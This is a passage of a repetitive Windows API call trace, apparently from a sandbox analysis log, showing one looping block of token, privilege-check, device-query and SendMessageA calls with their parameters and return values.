(in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.055] GetLastError () returned 0x578 [0017.055] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.055] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.055] GetCurrentThread () returned 0xfffffffe [0017.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.055] GetLastError () returned 0x3f0 [0017.055] GetCurrentProcess () returned 0xffffffff [0017.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.055] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.055] SetLastError (dwErrCode=0x522) [0017.055] CloseHandle (hObject=0x114) returned 1 [0017.055] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.055] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.056] GetLastError () returned 0x578 [0017.056] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.056] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.056] GetCurrentThread () returned 0xfffffffe [0017.056] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.056] GetLastError () returned 0x3f0 [0017.056] GetCurrentProcess () returned 0xffffffff [0017.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.056] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.056] SetLastError (dwErrCode=0x522) [0017.056] CloseHandle (hObject=0x114) returned 1 [0017.056] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.056] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.056] GetLastError () returned 0x578 [0017.056] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.056] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.056] GetCurrentThread () returned 0xfffffffe [0017.056] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.056] GetLastError () returned 0x3f0 [0017.056] GetCurrentProcess () returned 0xffffffff [0017.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.056] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.056] SetLastError (dwErrCode=0x522) [0017.056] CloseHandle (hObject=0x114) returned 1 [0017.056] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.056] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.056] GetLastError () returned 0x578 [0017.056] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.056] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.056] GetCurrentThread () returned 0xfffffffe [0017.056] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.056] GetLastError () returned 0x3f0 [0017.056] GetCurrentProcess () returned 0xffffffff [0017.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.056] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.056] SetLastError (dwErrCode=0x522) [0017.056] CloseHandle (hObject=0x114) returned 1 [0017.056] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.056] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.056] GetLastError () returned 0x578 [0017.056] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.056] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.056] GetCurrentThread () returned 0xfffffffe [0017.056] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.057] GetLastError () returned 0x3f0 [0017.057] GetCurrentProcess () returned 0xffffffff [0017.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.057] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.057] SetLastError (dwErrCode=0x522) [0017.057] CloseHandle (hObject=0x114) returned 1 [0017.057] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.057] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.057] GetLastError () returned 0x578 [0017.057] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.057] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.057] GetCurrentThread () returned 0xfffffffe [0017.057] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.057] GetLastError () returned 0x3f0 [0017.057] GetCurrentProcess () returned 0xffffffff [0017.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.057] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.057] SetLastError (dwErrCode=0x522) [0017.057] CloseHandle (hObject=0x114) returned 1 [0017.057] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.057] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.057] GetLastError () returned 0x578 [0017.057] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.057] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.057] GetCurrentThread () returned 0xfffffffe [0017.057] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.057] GetLastError () returned 0x3f0 [0017.057] GetCurrentProcess () returned 0xffffffff [0017.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.057] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.057] SetLastError (dwErrCode=0x522) [0017.057] CloseHandle (hObject=0x114) returned 1 [0017.057] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.057] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.057] GetLastError () returned 0x578 [0017.057] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.057] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.057] GetCurrentThread () returned 0xfffffffe [0017.057] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.057] GetLastError () returned 0x3f0 [0017.057] GetCurrentProcess () returned 0xffffffff [0017.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.057] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.057] SetLastError (dwErrCode=0x522) [0017.058] CloseHandle (hObject=0x114) returned 1 [0017.058] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.058] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.058] GetLastError () returned 0x578 [0017.058] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.058] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.058] GetCurrentThread () returned 0xfffffffe [0017.058] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.058] GetLastError () returned 0x3f0 [0017.058] GetCurrentProcess () returned 0xffffffff [0017.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.058] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.058] SetLastError (dwErrCode=0x522) [0017.058] CloseHandle (hObject=0x114) returned 1 [0017.058] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.058] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.058] GetLastError () returned 0x578 [0017.058] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.058] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.058] GetCurrentThread () returned 0xfffffffe [0017.058] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.058] GetLastError () returned 0x3f0 [0017.058] GetCurrentProcess () returned 0xffffffff [0017.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.058] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.058] SetLastError (dwErrCode=0x522) [0017.058] CloseHandle (hObject=0x114) returned 1 [0017.058] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.058] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.058] GetLastError () returned 0x578 [0017.058] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.058] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.058] GetCurrentThread () returned 0xfffffffe [0017.058] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.058] GetLastError () returned 0x3f0 [0017.058] GetCurrentProcess () returned 0xffffffff [0017.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.058] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.058] SetLastError (dwErrCode=0x522) [0017.058] CloseHandle (hObject=0x114) returned 1 [0017.058] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.058] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.058] GetLastError () returned 0x578 [0017.058] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.059] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.059] GetCurrentThread () returned 0xfffffffe [0017.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.059] GetLastError () returned 0x3f0 [0017.059] GetCurrentProcess () returned 0xffffffff [0017.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.059] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.059] SetLastError (dwErrCode=0x522) [0017.059] CloseHandle (hObject=0x114) returned 1 [0017.059] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.059] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.059] GetLastError () returned 0x578 [0017.059] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.059] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.059] GetCurrentThread () returned 0xfffffffe [0017.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.059] GetLastError () returned 0x3f0 [0017.059] GetCurrentProcess () returned 0xffffffff [0017.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.059] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.059] SetLastError (dwErrCode=0x522) [0017.059] CloseHandle (hObject=0x114) returned 1 [0017.059] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.059] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.059] GetLastError () returned 0x578 [0017.059] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.059] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.059] GetCurrentThread () returned 0xfffffffe [0017.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.059] GetLastError () returned 0x3f0 [0017.059] GetCurrentProcess () returned 0xffffffff [0017.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.059] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.059] SetLastError (dwErrCode=0x522) [0017.059] CloseHandle (hObject=0x114) returned 1 [0017.059] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.059] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.059] GetLastError () returned 0x578 [0017.059] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.059] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.059] GetCurrentThread () returned 0xfffffffe [0017.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.059] GetLastError () returned 0x3f0 [0017.060] GetCurrentProcess () returned 0xffffffff [0017.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.060] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.060] SetLastError (dwErrCode=0x522) [0017.060] CloseHandle (hObject=0x114) returned 1 [0017.060] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.060] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.060] GetLastError () returned 0x578 [0017.060] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.060] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.060] GetCurrentThread () returned 0xfffffffe [0017.060] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.060] GetLastError () returned 0x3f0 [0017.060] GetCurrentProcess () returned 0xffffffff [0017.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.060] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.060] SetLastError (dwErrCode=0x522) [0017.060] CloseHandle (hObject=0x114) returned 1 [0017.060] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.060] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.060] GetLastError () returned 0x578 [0017.060] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.060] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.060] GetCurrentThread () returned 0xfffffffe [0017.060] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.060] GetLastError () returned 0x3f0 [0017.060] GetCurrentProcess () returned 0xffffffff [0017.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.060] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.060] SetLastError (dwErrCode=0x522) [0017.060] CloseHandle (hObject=0x114) returned 1 [0017.060] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.060] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.060] GetLastError () returned 0x578 [0017.060] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.060] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.060] GetCurrentThread () returned 0xfffffffe [0017.060] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.060] GetLastError () returned 0x3f0 [0017.060] GetCurrentProcess () returned 0xffffffff [0017.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.060] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.060] SetLastError (dwErrCode=0x522) [0017.060] CloseHandle (hObject=0x114) returned 1 [0017.061] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.061] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.061] GetLastError () returned 0x578 [0017.061] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.061] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.061] GetCurrentThread () returned 0xfffffffe [0017.061] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.061] GetLastError () returned 0x3f0 [0017.061] GetCurrentProcess () returned 0xffffffff [0017.061] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.061] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.061] SetLastError (dwErrCode=0x522) [0017.061] CloseHandle (hObject=0x114) returned 1 [0017.061] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.061] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.061] GetLastError () returned 0x578 [0017.061] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.061] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.061] GetCurrentThread () returned 0xfffffffe [0017.061] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.061] GetLastError () returned 0x3f0 [0017.061] GetCurrentProcess () returned 0xffffffff [0017.061] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.061] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.061] SetLastError (dwErrCode=0x522) [0017.061] CloseHandle (hObject=0x114) returned 1 [0017.061] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.061] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.061] GetLastError () returned 0x578 [0017.061] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.061] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.061] GetCurrentThread () returned 0xfffffffe [0017.061] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.061] GetLastError () returned 0x3f0 [0017.061] GetCurrentProcess () returned 0xffffffff [0017.061] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.061] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.061] SetLastError (dwErrCode=0x522) [0017.061] CloseHandle (hObject=0x114) returned 1 [0017.061] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.061] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.061] GetLastError () returned 0x578 [0017.061] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.062] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.062] GetCurrentThread () returned 0xfffffffe [0017.062] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.062] GetLastError () returned 0x3f0 [0017.062] GetCurrentProcess () returned 0xffffffff [0017.062] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.062] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.062] SetLastError (dwErrCode=0x522) [0017.062] CloseHandle (hObject=0x114) returned 1 [0017.062] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 